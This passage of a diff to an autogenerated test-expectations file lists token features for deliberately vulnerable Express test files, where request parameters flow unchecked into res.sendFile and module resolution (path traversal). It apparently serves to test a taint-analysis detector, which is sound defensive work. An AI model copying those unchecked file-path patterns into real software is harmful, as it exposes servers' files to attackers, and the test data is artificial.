tokenFeatures | autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | req.param("module") | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | | autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | req.param("module") | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-require.js:14:11:14:29 | req.param("module") | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:15:14:19 | param | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:15:14:19 | param | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:14:15:14:19 | param | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:15:14:19 | param | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:15:14:19 | param | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:14:21:14:28 | "module" | CalleeFlexibleAccessPath | req.param | | autogenerated/TaintedPath/tainted-require.js:14:21:14:28 | "module" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-require.js:14:21:14:28 | "module" | contextFunctionInterfaces | | @@ -10890,6 +85506,21 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:14:32:14:53 | { based ... rname } | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | | autogenerated/TaintedPath/tainted-require.js:14:32:14:53 | { based ... rname } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-require.js:14:32:14:53 | { based ... rname } | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:40 | basedir | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:40 | basedir | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:40 | basedir | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:40 | basedir | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:40 | basedir | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:51 | basedir: __dirname | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:51 | basedir: __dirname | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:51 | basedir: __dirname | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:51 | basedir: __dirname | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:51 | basedir: __dirname | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:51 | basedir: __dirname | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:51 | basedir: __dirname | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:51 | basedir: __dirname | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:51 | basedir: __dirname | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:34:14:51 | basedir: __dirname | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:14:43:14:51 | __dirname | CalleeFlexibleAccessPath | resolve | | autogenerated/TaintedPath/tainted-require.js:14:43:14:51 | __dirname | InputAccessPathFromCallee | 1.basedir | | autogenerated/TaintedPath/tainted-require.js:14:43:14:51 | __dirname | InputArgumentIndex | 1 | @@ -10900,6 +85531,21 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:14:43:14:51 | __dirname | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | | autogenerated/TaintedPath/tainted-require.js:14:43:14:51 | __dirname | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-require.js:14:43:14:51 | __dirname | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:56:14:55 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:56:14:55 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:14:56:14:55 | this | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:56:14:55 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:56:14:55 | this | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | 'arguments' object of anonymous function | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | exceptional return of anonymous function | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | exceptional return of anonymous function | fileImports | express resolve | | autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | functio ... es;\\n } | CalleeFlexibleAccessPath | resolve | | autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | functio ... es;\\n } | InputArgumentIndex | 2 | | autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | functio ... es;\\n } | calleeImports | resolve | @@ -10908,12 +85554,90 @@ tokenFeatures | autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | functio ... es;\\n } | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | | autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | functio ... es;\\n } | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | functio ... es;\\n } | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | return of anonymous function | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:56:16:3 | return of anonymous function | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:65:14:67 | err | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:65:14:67 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/TaintedPath/tainted-require.js:14:65:14:67 | err | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:65:14:67 | err | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:65:14:67 | err | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:70:14:72 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:70:14:72 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:14:70:14:72 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-require.js:14:70:14:72 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/TaintedPath/tainted-require.js:14:70:14:72 | res | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:70:14:72 | res | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:14:70:14:72 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:70:14:72 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:14:70:14:72 | res | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:14:70:14:72 | res | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:15:9:15:14 | module | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:15:9:15:14 | module | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/TaintedPath/tainted-require.js:15:9:15:14 | module | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:15:9:15:14 | module | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:15:9:15:14 | module | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:15:9:15:20 | module = res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:15:9:15:20 | module = res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/TaintedPath/tainted-require.js:15:9:15:20 | module = res | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:15:9:15:20 | module = res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:15:9:15:20 | module = res | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-require.js:15:18:15:20 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-require.js:15:18:15:20 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/TaintedPath/tainted-require.js:15:18:15:20 | res | enclosingFunctionBody | req res module resolve sync req param module resolve req param module basedir __dirname err res module res | +| autogenerated/TaintedPath/tainted-require.js:15:18:15:20 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-require.js:15:18:15:20 | res | fileImports | express resolve | +| autogenerated/TaintedPath/tainted-sendFile.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:1:1:0 | this | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:1:1:1:1 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:1:1:1 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:1:1:1 | path | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:1:1:1 | require | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:1:5:1:11 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:5:1:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:5:1:11 | express | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:1:5:1:32 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:5:1:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:5:1:32 | express | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:1:5:1:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:5:1:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:5:1:32 | express ... press') | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:1:15:1:21 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:15:1:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:15:1:21 | require | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:1:15:1:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:15:1:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:15:1:32 | exceptional return of require('express') | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:1:15:1:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:15:1:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:1:15:1:32 | require('express') | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:1:23:1:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/tainted-sendFile.js:1:23:1:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:1:23:1:31 | 'express' | calleeImports | | | autogenerated/TaintedPath/tainted-sendFile.js:1:23:1:31 | 'express' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-sendFile.js:1:23:1:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-sendFile.js:1:23:1:31 | 'express' | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:2:5:2:8 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:5:2:8 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:5:2:8 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:5:2:8 | path | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:2:5:2:26 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:5:2:26 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:5:2:26 | path | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:2:5:2:26 | path = ... 'path') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:5:2:26 | path = ... 'path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:5:2:26 | path = ... 'path') | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:2:12:2:18 | require | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:12:2:18 | require | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:2:12:2:26 | exceptional return of require('path') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:12:2:26 | exceptional return of require('path') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:2:12:2:26 | exceptional return of require('path') | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:2:12:2:26 | require('path') | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-sendFile.js:2:12:2:26 | require('path') | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-sendFile.js:2:12:2:26 | require('path') | fileImports | express path | @@ -10923,6 +85647,39 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:2:20:2:25 | 'path' | contextFunctionInterfaces | | | autogenerated/TaintedPath/tainted-sendFile.js:2:20:2:25 | 'path' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-sendFile.js:2:20:2:25 | 'path' | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:4:5:4:7 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:5:4:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:5:4:7 | app | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:4:5:4:19 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:5:4:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:5:4:19 | app | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:4:5:4:19 | app = express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:5:4:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:5:4:19 | app = express() | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:4:11:4:17 | express | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:11:4:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:11:4:17 | express | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:4:11:4:19 | exceptional return of express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:11:4:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:11:4:19 | exceptional return of express() | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:4:11:4:19 | express() | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:11:4:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:4:11:4:19 | express() | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:6:3 | app | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:6:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:6:3 | app | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:6:7 | app.get | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:6:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:6:7 | app.get | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:28:2 | app.get ... ta/'\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:28:2 | app.get ... ta/'\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:28:2 | app.get ... ta/'\\n}) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:28:2 | exceptional return of app.get ... ta/'\\n}) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:28:2 | exceptional return of app.get ... ta/'\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:1:28:2 | exceptional return of app.get ... ta/'\\n}) | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:5:6:7 | get | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:5:6:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:5:6:7 | get | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:6:9:6:23 | '/some/path/:x' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/tainted-sendFile.js:6:9:6:23 | '/some/path/:x' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-sendFile.js:6:9:6:23 | '/some/path/:x' | calleeImports | express | @@ -10930,6 +85687,26 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:6:9:6:23 | '/some/path/:x' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/tainted-sendFile.js:6:9:6:23 | '/some/path/:x' | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:6:9:6:23 | '/some/path/:x' | receiverName | app | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:6:25 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:6:25 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:6:25 | path | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:6:25 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:6:25 | path | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:6:25 | this | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:6:25 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:6:25 | this | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:6:25 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:6:25 | this | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | 'arguments' object of anonymous function | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | exceptional return of anonymous function | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | exceptional return of anonymous function | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | functio ... ata/'\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | functio ... ata/'\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | functio ... ata/'\\n} | calleeImports | express | @@ -10937,6 +85714,71 @@ tokenFeatures | autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | functio ... ata/'\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | functio ... ata/'\\n} | fileImports | express path | | autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | functio ... ata/'\\n} | receiverName | app | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | return of anonymous function | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:6:26:28:1 | return of anonymous function | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:35:6:37 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:35:6:37 | req | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:35:6:37 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:35:6:37 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:6:35:6:37 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:6:35:6:37 | req | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:6:35:6:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:6:35:6:37 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:6:35:6:37 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:35:6:37 | req | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:40:6:42 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:40:6:42 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:40:6:42 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-sendFile.js:6:40:6:42 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:6:40:6:42 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:6:40:6:42 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:6:40:6:42 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:6:40:6:42 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:6:40:6:42 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:6:40:6:42 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:5 | res | enclosingFunctionBody | req res res sendFile req param gimme res sendfile req param gimme res sendFile req param gimme root process cwd res sendfile req param gimme root process cwd res sendFile req param file root req param dir homeDir path resolve . res sendFile homeDir /data/ req params x res sendfile data/ req params x res sendFile path resolve data req params x res sendfile path join data req params x res sendFile homeDir path join data req params x | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:5 | res | fileImports | express path | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:14 | res.sendFile | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:14 | res.sendFile | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-sendFile.js:8:3:8:14 | res.sendFile 